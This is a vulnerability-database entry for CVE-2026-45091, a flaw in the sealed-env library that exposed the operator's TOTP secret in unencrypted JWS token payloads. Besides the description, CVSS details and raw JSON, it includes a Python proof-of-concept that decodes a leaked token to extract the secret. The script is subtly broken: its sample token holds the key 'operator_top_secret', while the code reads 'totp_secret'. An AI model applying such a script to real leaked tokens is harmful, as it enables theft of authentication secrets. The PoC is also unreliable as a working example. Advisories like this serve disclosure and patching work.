Security Vulnerability Report
中文
CVE-2026-45091 CVSS 9.1 CRITICAL

CVE-2026-45091

Published: 2026-05-12 14:17:09
Last Modified: 2026-05-12 14:17:09
Source: [email protected]

Description

sealed-env is a cross-stack, zero-trust secret management library for Node.js and Java/Spring Boot. In sealed-env enterprise mode, versions 0.1.0-alpha.1 through 0.1.0-alpha.3 embedded the operator's literal TOTP secret in the JWS payload of every minted unseal token. JWS payload is base64-encoded JSON, NOT encrypted. Any party who could observe a minted token (CI build logs, container env dumps, kubectl describe pod, Sentry/Rollbar stack traces, log aggregators) could decode the payload and extract the TOTP secret in plaintext. This vulnerability is fixed in 0.1.0-alpha.4.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

sealed-env 0.1.0-alpha.1
sealed-env 0.1.0-alpha.2
sealed-env 0.1.0-alpha.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import base64 import json # Simulated leaked JWS token found in logs (Header.Payload.Signature) # The payload contains the 'totp_secret' in plaintext leaked_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJvcGVyYXRvcl90b3Bfc2VjcmV0IjoiS0VZLTEyMzQ1Njc4OTAiLCJ1c2VyIjoiYWRtaW4ifQ.signature_placeholder" # Function to extract TOTP secret def extract_totp_from_token(token): try: # Split token into parts parts = token.split('.') if len(parts) < 2: return "Invalid token format" payload_b64 = parts[1] # Add padding if necessary to make length a multiple of 4 padding = 4 - len(payload_b64) % 4 if padding != 4: payload_b64 += '=' * padding # Decode Base64 decoded_bytes = base64.urlsafe_b64decode(payload_b64) decoded_str = decoded_bytes.decode('utf-8') # Parse JSON payload_json = json.loads(decoded_str) # Extract secret (Key name may vary based on actual implementation) # Common keys: 'totp_secret', 'secret', 'key' secret = payload_json.get('totp_secret') return secret except Exception as e: return f"Error: {e}" print(f"Extracted Secret: {extract_totp_from_token(leaked_token)}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-45091", "sourceIdentifier": "[email protected]", "published": "2026-05-12T14:17:08.820", "lastModified": "2026-05-12T14:17:08.820", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "sealed-env is a cross-stack, zero-trust secret management library for Node.js and Java/Spring Boot. In sealed-env enterprise mode, versions 0.1.0-alpha.1 through 0.1.0-alpha.3 embedded the operator's literal TOTP secret in the JWS payload of every minted unseal token. JWS payload is base64-encoded JSON, NOT encrypted. Any party who could observe a minted token (CI build logs, container env dumps, kubectl describe pod, Sentry/Rollbar stack traces, log aggregators) could decode the payload and extract the TOTP secret in plaintext. This vulnerability is fixed in 0.1.0-alpha.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-522"}]}], "references": [{"url": "https://github.com/davidalmeidac/sealed-env/security/advisories/GHSA-x3r2-fj3r-g5mv", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.